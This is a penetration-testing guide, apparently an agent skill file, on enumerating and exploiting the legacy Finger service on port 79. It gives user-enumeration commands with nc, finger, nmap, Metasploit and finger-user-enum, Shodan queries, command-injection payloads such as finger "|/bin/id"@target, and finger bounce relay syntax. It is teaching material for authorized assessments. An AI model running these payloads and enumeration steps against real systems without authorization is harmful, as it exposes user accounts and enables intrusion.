Finger Protocol Pentesting

A skill for enumerating and exploiting the Finger protocol (TCP port 79) during security assessments.

When to Use This Skill

Use this skill when:

• You need to enumerate users on a target system via the Finger protocol
• Port 79 is open on a target during reconnaissance
• You're performing user enumeration as part of an assessment
• You need to test for finger protocol vulnerabilities (command injection, bounce attacks)
• You want to gather information about user accounts on a remote system

Basic Information

The Finger protocol (RFC 1288) is a legacy service used to retrieve information about users on a system. It typically reveals:

• Login names and full names
• Office location and phone numbers
• Login time and idle time
• Last mail read time
• Contents of plan and project files

Default port: 79/tcp

Enumeration Techniques

1. Banner Grabbing and Basic Connection

Start with a simple connection to verify the service is running:

# Basic connection to port 79
nc -vn <target-ip> 79

# Send a username to query
nc -vn <target-ip> 79 <<< "root"

2. User Enumeration

Query the finger service to list available users:

# List all users on the target
finger @<target-ip>

# Get information about a specific user
finger admin@<target-ip>
finger user@<target-ip>

3. Automated User Enumeration

Use

finger-user-enum.pl

(from pentestmonkey) for batch enumeration:

# Enumerate users from a wordlist
finger-user-enum.pl -U /path/to/users.txt -t <target-ip>

# Check a specific user
finger-user-enum.pl -u root -t <target-ip>

# Enumerate multiple targets
finger-user-enum.pl -U /path/to/users.txt -T /path/to/ips.txt

4. Nmap Scripts

Use Nmap's built-in finger scripts:

# Basic finger scan
nmap -sV -p 79 <target-ip>

# Use NSE scripts for finger enumeration
nmap --script finger <target-ip>
nmap --script finger-users <target-ip>

5. Metasploit

Metasploit provides auxiliary modules for finger enumeration:

msfconsole
use auxiliary/scanner/finger/finger_users
set RHOSTS <target-ip>
run

6. Shodan Search

Search for finger services on the internet:

port:79
port:79 "USER"

Exploitation Techniques

Command Injection

Some finger implementations are vulnerable to command injection:

# Attempt to execute /bin/id
finger "|/bin/id"@<target-ip>

# Attempt to list files
finger "|/bin/ls -a /"@<target-ip>

Finger Bounce Attack

Use a compromised system as a relay to access internal networks:

# Bounce through an external system to reach internal targets
finger user@internal-host@external-relay

# Bounce from internal to external
finger @internal-system@external-system

Workflow

1. Reconnaissance: Identify if port 79 is open on the target
2. Banner Grabbing: Connect to port 79 to verify service
3. User Enumeration: Query for user information using various techniques
4. Vulnerability Testing: Test for command injection and bounce vulnerabilities
5. Documentation: Record all findings for the assessment report

Example Session

# Step 1: Check if port 79 is open
nmap -p 79 192.168.1.100

# Step 2: Banner grab
nc -vn 192.168.1.100 79

# Step 3: Enumerate users
finger @192.168.1.100

# Step 4: Query specific users
for user in root admin test; do
    echo "=== $user ==="
    finger $user@192.168.1.100
done

# Step 5: Test for vulnerabilities
finger "|/bin/id"@192.168.1.100

Notes

• The Finger protocol is largely deprecated and rarely found on modern systems
• Many systems block port 79 at the firewall level
• Always have proper authorization before testing finger services
• Document all findings as they may reveal valid usernames for further testing
• Be aware that some finger implementations may log queries

References

• RFC 1288: The Finger Protocol
• PentestMonkey finger-user-enum: http://pentestmonkey.net/tools/user-enumeration/finger-user-enum
• SecurityTeam Finger Bounce: https://securiteam.com/exploits/2BUQ2RFQ0I/